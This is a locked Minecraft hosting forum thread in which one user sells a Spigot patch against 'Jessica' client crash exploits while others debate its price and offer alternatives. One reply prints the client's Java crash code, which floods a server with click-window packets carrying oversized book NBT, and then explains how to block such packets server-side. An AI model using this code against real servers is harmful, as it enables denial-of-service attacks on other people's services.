Spigot Patch (class or spigot) | Anti crasher | Jessica and private exploits

Status
This thread has been locked.

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
I've seen many people (two or three) requesting this so yeah, decided to sell this. If you want to test if it works I can give you the client or you can join my test server with it and try to crash it, just send me a pm!

This spigot patch contains a fix for four exploits that you can use to lag or crash big servers like minemen, lunar, faithful or viper.

0c5c515955caa88f2ca665b35a29bed0.png


Note: I'll be selling the java class or the spigot with the fix
2nd note: There is not a price set, I will deal the price with each user depending on their needs (somewhere around 60€)
 
Last edited:
PebbleHost
High performance, consistent uptime and fast support. Minecraft hosting that just works.

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
Wait, let me get this right. Up until just now you had been selling $60 crash fix for 1 singular client? Holy shit that’s fucking outrageous. Anyone with any knowledge of how to use a debug or basic understanding of how an anticheat works or how to make a crasher could easily sell a plugin for like 10-20 $ or free and patch the vast majority, my friend has one that is private but it literally prevents every crasher he’s tested and guess why, because it isn’t like you are making a NASA rocket you are making a detection for something (more then likely) doing an action that is not possible to be done legitimately. This is literally a money grab, if you actually cared to prevent crashers on a broad scale make it public (free) and let people report them to you. This is blatantly just a way for you to get money, especially seeing as up until a few hours ago you were charging $60+ for access to something that only blocked 1 crasher.
If it's that easy, why big servers don't fix it?
 

Killstreak702

Premium
Feedback score
1
Posts
227
Reactions
105
Resources
0
It's for the "Jessica" client (see title)

Basically a lot of people can't figure out how to fix it and it probably isn't that hard to fix

//EDIT: There are a couple different methods the client uses but this is one of them
General code for the crash
Code:
Wrapper.msg("Attack!", true);
            ItemStack bookObj = new ItemStack(Items.WRITABLE_BOOK);
            NBTTagList list = new NBTTagList();
            NBTTagCompound tag = new NBTTagCompound();
            String author = Minecraft.getMinecraft().getSession().getUsername();
            String title = "Title";
            String size = "wveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5vr2c43rc434v432tvt4tvybn4n6n57u6u57m6m6678mi68,867,79o,o97o,978iun7yb65453v4tyv34t4t3c2cc423rc334tcvtvt43tv45tvt5t5v43tv5345tv43tv5355vt5t3tv5t533v5t45tv43vt4355t54fwveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5vr2c43rc434v432tvt4tvybn4n6n57u6u57m6m6678mi68,867,79o,o97o,978iun7yb65453v4tyv34t4t3c2cc423rc334tcvtvt43tv45tvt5t5v43tv5345tv43tv5355vt5t3tv5t533v5t45tv43vt4355t54fwveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5";
            for (int i = 0; i < 50; i++)
            {
              String siteContent = size;
              NBTTagString tString = new NBTTagString(siteContent);
              list.appendTag(tString);
            }
            tag.setString("author", author);
            tag.setString("title", title);
            tag.setTag("pages", list);
            bookObj.setTagInfo("pages", list);
            bookObj.setTagCompound(tag);
            for (;;)
            {
              Wrapper.sendPacket(new CPacketClickWindow(0, 0, 0, ClickType.PICKUP, bookObj, (short)0));
              Thread.sleep(12L);
            }
All it does is creates a click window packet with;
Window ID of 0 - 0 always means the player's own inventory,
Slot of 0 (meaning the window click always happens in the same slot - slot 0 is actually the result crafting slot, the slot where crafted items go after being crafted in the 2x2 in the player inventory),
Button clicked is 0 (meaning the button used to click is LEFT CLICK),
Action of PICKUP (used by the server for the "Confirm Transaction" packet - https://wiki.vg/Protocol#Confirm_Transaction_.28clientbound.29),
Mode of 0 (same as Action basically),
The clicked item slot, defined as 0 (-1 means "drop item")

Click Window packet: https://wiki.vg/Protocol#Click_Window

Considering the data, this should be a pretty easy thing to patch. On top of that, it literally spams them in a for loop, waits 12ms, then repeats. Even if the player has 300 ping the server would receive them every 300ms or so.

If this exploit - or any other exploit - manages to harm a server by the server just receiving the packet, you can always detect exploits like this at the lowest level possible in the server. The absolute lowest level of serverbound packets being received from clients is in the PacketDecoder class (at this stage you just have the packet ID [unique for every packet], the Packet object itself, the ChannelHandlerContext object [containing the Channel], and the PacketDataSerializer object), second would be when the data is being read in the packet class itself (PacketPlayInWindowClick, the "a" method that takes a PacketDataSerializer), third would be the NetworkManager class, fourth being PlayerConnection. If a harmful packet reaches the PlayerConnection stage (where packets are actually processed and Bukkit events are called), then it will harm your server. It cannot harm your server otherwise if it's at a lower level and you stop it before it reaches that level and prevent further packets from that IP address being sent. I recommend just blocking the IP + player UUID entirely if a harmful packet is detected, otherwise they will keep spamming them.

Edit: I got Packet/NetworkManager swapped around on accident, but you get the idea in how it works and how packets are processed server-side.
 
Last edited:

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
All it does is creates a click window packet with;
Window ID of 0 - 0 always means the player's own inventory,
Slot of 0 (meaning the window click always happens in the same slot - slot 0 is actually the result crafting slot, the slot where crafted items go after being crafted in the 2x2 in the player inventory),
Button clicked is 0 (meaning the button used to click is LEFT CLICK),
Action of PICKUP (used by the server for the "Confirm Transaction" packet - https://wiki.vg/Protocol#Confirm_Transaction_.28clientbound.29),
Mode of 0 (same as Action basically),
The clicked item slot, defined as 0 (-1 means "drop item")

Click Window packet: https://wiki.vg/Protocol#Click_Window

Considering the data, this should be a pretty easy thing to patch. On top of that, it literally spams them in a for loop, waits 12ms, then repeats. Even if the player has 300 ping the server would receive them every 300ms or so.

If this exploit - or any other exploit - manages to harm a server by the server just receiving the packet, you can always detect exploits like this at the lowest level possible in the server. The absolute lowest level of serverbound packets being received from clients is in the PacketDecoder class (at this stage you just have the packet ID [unique for every packet], the Packet object itself, the ChannelHandlerContext object [containing the Channel], and the PacketDataSerializer object), second would be when the data is being read in the packet class itself (PacketPlayInWindowClick, the "a" method that takes a PacketDataSerializer), third would be the NetworkManager class, fourth being PlayerConnection. If a harmful packet reaches the PlayerConnection stage (where packets are actually processed and Bukkit events are called), then it will harm your server. It cannot harm your server otherwise if it's at a lower level and you stop it before it reaches that level and prevent further packets from that IP address being sent. I recommend just blocking the IP + player UUID entirely if a harmful packet is detected, otherwise they will keep spamming them.

Edit: I got Packet/NetworkManager swapped around on accident, but you get the idea in how it works and how packets are processed server-side.
You got the idea right, now develop it if you want
 

LillianA

beep boop
Premium
Feedback score
7
Posts
347
Reactions
259
Resources
0
The exploit itself doesn't look hard to patch and while the client does have like 2-3 "different" methods afaik they all abuse that same thing. I'm surprised no one has released something free for this yet and if no one has by the time I end up getting a new laptop I might since it won't only be useful to other people it'd be useful to me as well.
 

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
The exploit itself doesn't look hard to patch and while the client does have like 2-3 "different" methods afaik they all abuse that same thing. I'm surprised no one has released something free for this yet and if no one has by the time I end up getting a new laptop I might since it won't only be useful to other people it'd be useful to me as well.
You can buy it ;)
 

kayohmedy

Premium
Feedback score
2
Posts
187
Reactions
79
Resources
0
Just to inform some people..
CasualProtector (find it on spigotmc or just write it in google) - it fixes all of these exploits that are mentioned here and much more, only for 5$. That's my resource and a lot of big networks use it. I have lots of my own crashers so I know how to fix them.
last post was in may...
RvcKi8c.png
 

Trendingz

Feedback score
0
Posts
37
Reactions
21
Resources
0
Just to inform some people..
CasualProtector (find it on spigotmc or just write it in google) - it fixes all of these exploits that are mentioned here and much more, only for 5$. That's my resource and a lot of big networks use it. I have lots of my own crashers so I know how to fix them.
Actually never mind I thought this was a different thread.
 
Last edited:

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
Just to inform some people..
CasualProtector (find it on spigotmc or just write it in google) - it fixes all of these exploits that are mentioned here and much more, only for 5$. That's my resource and a lot of big networks use it. I have lots of my own crashers so I know how to fix them.
It doesn't.
 
Status
This thread has been locked.
Top